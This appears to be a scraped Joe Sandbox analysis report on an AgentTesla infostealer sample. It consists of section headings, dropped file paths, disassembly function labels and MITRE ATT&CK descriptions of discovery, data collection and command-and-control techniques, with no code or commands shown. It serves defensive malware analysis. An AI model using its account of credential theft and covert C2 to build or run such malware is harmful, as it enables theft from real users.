Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IwUNvHNy.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.log

C:\Users\user\AppData\Local\Temp\tmp2885.tmp

C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp

C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Function 0177B8C1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
threadCOMMON

Function 0177B8D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Function 017798D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194
COMMON

Function 0177FD40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Function 0177FDED Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114
COMMON

Function 0177FDF8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Function 0177BAF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Function 01779500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
libraryCOMMON

Function 0177BAF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Function 01779D30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
libraryCOMMON

Function 0177950C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
libraryCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre